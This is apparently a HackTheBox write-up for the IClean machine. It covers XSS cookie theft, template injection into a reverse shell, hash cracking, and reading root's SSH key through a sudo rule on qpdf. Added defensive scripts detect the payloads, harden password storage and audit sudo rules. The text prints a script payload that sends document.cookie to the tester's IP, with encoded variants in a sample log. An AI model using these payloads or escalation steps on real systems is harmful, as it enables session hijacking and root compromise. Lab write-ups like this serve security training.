HTB IClean writeup [30 pts]
IClean is a Linux medium machine where we will learn different things. First, there is a website offering a cleaning service where I will exploit an XSS vulnerability to retrieve the admin’s cookie. Then, I will exploit an SSTI vulnerability to gain access as www-data. From there, I can get credentials for the database and crack a hash for the consuela user. Finally, I will abuse the --add-attachment option of qpdf to exploit a sudoers privilege.
Enumeration
Port scanning
I will start with a basic TCP port scanning with nmap to see which ports are open and see which services are running:
- -sVC: Identifies service and version.
- -p-: scans the whole port range (1-65535).
- --open: shows only open ports, not filtered or closed ones.
- -sS: TCP SYN scan, which is faster because it doesn’t complete the connection.
- --min-rate 5000: sends packets at a rate of at least 5000 per second to speed up the scan (don’t do this in a real environment).
- -n: Disables DNS resolution.
- -v: Enables verbose output to see which ports are open while it’s scanning.
- -Pn: Disables host discovery (ping).
- -oN targeted: Exports the evidence to a file named “tcpTargeted”.
Port 80 is open, running an Apache web server, so let’s jump into it.
Web enumeration
Looking at the server response, it’s very short:
It redirects to capiclean.htb, so I will add this line to /etc/hosts:
This page shows a cleaning service web:
Scrolling further down, there is a “Get a quote” button:
There, I can request a service to clean something, which makes a POST request to /sendMessage:
As it seems to send a message, I will try an HTML injection that loads an image from my HTTP server. For that, I will start a simple Python HTTP server:
The response doesn’t change, but we receive a request for test.jpg from the machine’s IP (10.10.11.12):
I will try to retrieve somebody’s cookie by injecting a script which sends a request to my server with their cookie as the path. Trying with <script>fetch("http://10.10.15.95/"+document.cookie)</script> doesn’t work, but with an onerror handler on an img tag I can successfully retrieve somebody’s cookie:
Fuzzing to find a route where this cookie would be useful, I can see /dashboard, which without the cookie redirects to /:
So I will add this cookie in Firefox and navigate to /dashboard:
There are several features here; let’s look at each one carefully.
Generate Invoice
This leads to /InvoiceGenerator, which is used to generate an invoice for the clients that want the cleaning service:
When some data is submitted, it gives an “Invoice ID”:
Generate QR
This page asks for an Invoice ID:
I will introduce the one I created before and see what happens:
Now, it gives a valid link for an image (which is a QR) that looks like this:
Also, there is a new form to generate the scannable invoice, where I need to enter the QR link given. I will enter it and see that it reflects my data:
Also notice that the img is loaded with the data:// wrapper:
For some strange reason, if I inject an SSTI payload, it is evaluated and the result is rendered there:
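From the defender’s side, both the cookie-stealing HTML injection in the quote form and the template expression reflected by the QR form leave recognisable traces in the submitted form bodies. The following script is an added example, not code from the writeup or from the IClean application: it runs a few indicator rules over constructed log lines of a hypothetical application log that records the method, path and raw form body of each POST. The /QRGenerator path, the timestamps and every value are made up for this example; the indicators themselves (script tag, img with onerror, document.cookie, a {{ }} expression, a callback URL with a raw IP) are the ones this writeup shows. The point it makes beyond the text is that matching must happen after URL-decoding the body, otherwise %3Cscript%3E slips past.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines from a hypothetical application log that records the
# method, path and raw form body of each POST. The /QRGenerator path and all
# values are made up for this example; none of it is real IClean log data.
SAMPLE_LOG = """\
2024-04-01T10:00:01 POST /sendMessage service=Carpet+cleaning&message=Please+call+me+back
2024-04-01T10:00:07 POST /sendMessage service=%3Cimg+src%3Dhttp%3A%2F%2F10.10.15.95%2Ftest.jpg%3E&message=hi
2024-04-01T10:00:15 POST /sendMessage service=%3Cimg+src%3Dx+onerror%3D%22fetch%28%27http%3A%2F%2F10.10.15.95%2F%27%2Bdocument.cookie%29%22%3E&message=hi
2024-04-01T10:01:30 POST /QRGenerator qr_link=http%3A%2F%2Fcapiclean.htb%2Fstatic%2Fqr.png
2024-04-01T10:01:44 POST /QRGenerator qr_link=%7B%7B7*7%7D%7D
2024-04-01T10:02:10 POST /sendMessage service=%3Cscript%3Efetch%28%22http%3A%2F%2F10.10.15.95%2F%22%2Bdocument.cookie%29%3C%2Fscript%3E&message=hi
"""

# Indicators matched against the *decoded* body. Each corresponds to something
# the writeup shows: the img/onerror and script payloads, the cookie
# exfiltration, the callback to a raw IP and the {{ }} template expression.
RULES = {
    "xss_script_tag": re.compile(r"<\s*script\b", re.I),
    "xss_event_handler": re.compile(r"\bon(?:error|load|click|mouseover|focus)\s*=", re.I),
    "html_injection_img": re.compile(r"<\s*img\b", re.I),
    "cookie_access": re.compile(r"document\.cookie", re.I),
    "ssti_expression": re.compile(r"\{\{.*?\}\}|\{%.*?%\}", re.S),
    "url_with_raw_ip": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}", re.I),
}


def decode_body(raw: str) -> str:
    """Undo application/x-www-form-urlencoded encoding before matching.
    Matching the raw line would miss %3Cscript%3E and friends."""
    return unquote_plus(raw)


def scan_log(text: str) -> list:
    """Return one finding per suspicious log line: its number, the request
    path and the names of every rule that matched the decoded form body."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        parts = line.split(" ", 3)
        if len(parts) < 4:
            continue  # malformed line or not a request line
        _timestamp, _method, path, body = parts
        decoded = decode_body(body)
        hits = [name for name, rx in RULES.items() if rx.search(decoded)]
        if hits:
            findings.append({"line": number, "path": path, "rules": hits})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"line {finding['line']:>3} {finding['path']:<14} {', '.join(finding['rules'])}")
```

Lines 2, 3, 5 and 6 of the sample are flagged; the harmless quote on line 1 and the legitimate QR link on line 4 are not. On the mitigation side, a cookie set with the HttpOnly flag is not readable through document.cookie, which would have blunted the exfiltration shown above, and a template engine should receive user input only as a variable passed to a fixed template, never spliced into the template source.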
Access as www-data
The only payload that works in this case to execute commands is this one from PayloadsAllTheThings:
So I will start a nc listener to receive a shell and launch the typical bash reverse shell one-liner:
And I receive the reverse shell!:
The “script /dev/null -c bash” command doesn’t work here:
So I will use python instead and do the same as always for a proper shell:
- python3 -c "import pty; pty.spawn('/bin/bash')": spawns a tty.
- ctrl+z: puts the shell in the background so it can be treated.
- stty raw -echo; fg: gives us the shell back.
- reset xterm: resets the terminal to give us the bash console.
- export TERM=xterm: lets us use ctrl+l to clear the terminal.
- export SHELL=bash: tells the system that we are using a bash console.
- stty rows <YOUR ROWS> columns <YOUR COLUMNS>: sets the size of the current full terminal window; you can get the right values by running stty size on your machine in a new full-size window.
Access as consuela
Looking at the users with a valid shell (entries ending in sh), there is only one user called ‘consuela’ apart from root:
Also, app.py checks the users against a SQL database:
This password doesn’t work with consuela:
But I can connect to the database:
In the capiclean database there is a ‘users’ table:
I will describe it to see the columns and extract the interesting ones:
There are two hashes, one for admin and another for consuela. These hashes are SHA-256, as can be seen in the login functionality of the script that runs the web server:
I will try to crack them with john, and consuela’s is crackable:
The password also works for consuela on the machine, so I have access as consuela:
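The reason consuela’s hash falls so easily is the scheme itself: an unsalted, fast hash means identical passwords produce identical digests and each guess costs a single SHA-256. The following is an added example, not code from the writeup or from app.py: it contrasts that legacy scheme with a salted, iterated KDF from the standard library. The find_weak_accounts audit is the defensive counterpart of what john did above (check stored hashes against a list of commonly used passwords), and the two accounts, their passwords and the wordlist are constructed for this example; the real IClean hashes and passwords are not reproduced.

```python
import hashlib
import hmac
import os
from typing import Dict, List

PBKDF2_ITERATIONS = 600_000  # OWASP's current minimum for PBKDF2-HMAC-SHA256


def legacy_sha256(password: str) -> str:
    """Unsalted SHA-256, the scheme the writeup finds in app.py. Equal
    passwords give equal digests and each guess costs one cheap hash."""
    return hashlib.sha256(password.encode()).hexdigest()


def find_weak_accounts(stored_hashes: Dict[str, str], common_passwords: List[str]) -> List[str]:
    """Audit: report accounts whose unsalted hash equals the hash of a commonly
    used password. With no salt, one digest per candidate checks every account
    at once, which is exactly what makes the scheme weak."""
    digests = {legacy_sha256(p) for p in common_passwords}
    return sorted(user for user, h in stored_hashes.items() if h in digests)


def hash_password(password: str, salt: bytes = b"") -> str:
    """Hardened form: per-user random salt plus a slow, iterated KDF. The salt
    and parameters are stored with the digest, so they need not be secret."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored parameters and compare in constant time.
    Malformed or foreign records verify as False rather than raising."""
    try:
        algo, iterations, salt_hex, digest_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(digest.hex(), digest_hex)


# Constructed sample data: two made-up accounts and a tiny wordlist. The real
# passwords and hashes from the IClean database are deliberately not used.
SAMPLE_USERS = {
    "alice": legacy_sha256("summer2024"),
    "bob": legacy_sha256("Tq8#vL9!mZ2pR4wE"),
}
SAMPLE_WORDLIST = ["password", "123456", "summer2024", "letmein"]

if __name__ == "__main__":
    print("weak accounts:", find_weak_accounts(SAMPLE_USERS, SAMPLE_WORDLIST))
    record = hash_password("Tq8#vL9!mZ2pR4wE")
    print("stored record:", record)
    print("verify correct:", verify_password("Tq8#vL9!mZ2pR4wE", record))
    print("verify wrong:  ", verify_password("wrong", record))
```

Two hashes of the same password under hash_password differ because each call draws a fresh salt, so a precomputed digest table is useless against it, and the iteration count makes each guess roughly six hundred thousand times more expensive than the single SHA-256 the application used.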
And we can see user.txt!:
Access as root
Looking at sudo privileges, I can run /usr/bin/qpdf as any user I want:
Searching for qpdf on Google, I can see it’s a C++ program to manage PDF files:
I also have the version:
There isn’t a known vulnerability for this version. However, I can read its documentation and see if I can find any functionality to abuse this sudo privilege as root. In this section there are options to list, add or delete embedded files in PDFs, so I will use --add-attachment to add /root/.ssh/id_rsa to a dummy PDF. For that, I will use an HTTP server to upload my PDF file to the machine:
Attacker machine:
IClean machine:
Now I execute this command to add the attachment /root/.ssh/id_rsa to dummyWithSSHKey.pdf:
I will transfer it to my machine to work with it more comfortably:
Attacker:
IClean:
Viewing it in Firefox, it’s possible to obtain the root ssh key:
Clicking on it just downloads it. Now I can connect as root to IClean and see root.txt!:
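The root cause here is a sudo rule, not a qpdf bug: any binary that can read arbitrary files does the same damage when it runs as root, whatever its advertised purpose. The following auditor is an added example, not code from the writeup: it parses “sudo -l”-style rule lines and flags the properties a reviewer should question before approving a rule. The sample output is constructed; the writeup shows the real entry only as a screenshot, so the NOPASSWD tag and the two extra rules are assumptions made for illustration, and the file-handling list contains only qpdf because that is the case this page demonstrates.

```python
import re
from typing import Dict, List

# Binaries that read or write arbitrary files when run as another user, with
# the reason. Only qpdf is listed here because that is the case the writeup
# demonstrates; a real audit list would be maintained by the reviewer.
FILE_HANDLING_BINARIES = {
    "qpdf": "--add-attachment embeds any file the target user can read into a PDF",
}

# Constructed "sudo -l"-style output for this example. The NOPASSWD tag and the
# last two rules are assumptions for illustration, not the IClean configuration.
SAMPLE_SUDO_L = """\
Matching Defaults entries for consuela on iclean:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User consuela may run the following commands on iclean:
    (ALL) NOPASSWD: /usr/bin/qpdf
    (root) /usr/bin/systemctl status nginx
    (ALL) NOPASSWD: /opt/scripts/*
"""

# One rule line: "(runas) [TAG: ...] command [args]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>\S.*)$")


def audit_sudo_rules(text: str) -> List[Dict]:
    """Parse each rule line and report the properties a reviewer would question.
    A command listed without arguments may be run with *any* arguments, which
    is what let --add-attachment be used in the writeup."""
    results = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue  # Defaults lines, headers and blank lines
        runas_users = [p.strip() for p in re.split(r"[:,]", m.group("runas"))]
        tags = [t.strip(": ") for t in m.group("tags").split() if t.strip(": ")]
        command, *args = m.group("cmd").split()
        binary = command.rsplit("/", 1)[-1]

        issues = []
        if "ALL" in runas_users:
            issues.append("runs_as_any_user")
        if "NOPASSWD" in tags:
            issues.append("no_password_required")
        if "*" in command:
            issues.append("wildcard_command")
        if not args:
            issues.append("unrestricted_arguments")
        if binary in FILE_HANDLING_BINARIES:
            issues.append(f"file_handling_binary: {FILE_HANDLING_BINARIES[binary]}")

        if "wildcard_command" in issues or binary in FILE_HANDLING_BINARIES:
            severity = "high"
        elif "runs_as_any_user" in issues or "unrestricted_arguments" in issues:
            severity = "medium"
        else:
            severity = "low"
        results.append({"rule": line.strip(), "binary": command, "severity": severity, "issues": issues})
    return results


if __name__ == "__main__":
    for r in audit_sudo_rules(SAMPLE_SUDO_L):
        print(f"[{r['severity']:>6}] {r['rule']}")
        for issue in r["issues"]:
            print(f"         - {issue}")
```

The qpdf rule scores high on every count: it runs as any user, needs no password, accepts any arguments and names a binary that embeds arbitrary readable files. The systemctl rule, pinned to a single subcommand and to root, produces no issues. The fix for the first rule is to remove it rather than to try to blacklist options, because argument filtering in sudoers is exact-match and easy to get wrong.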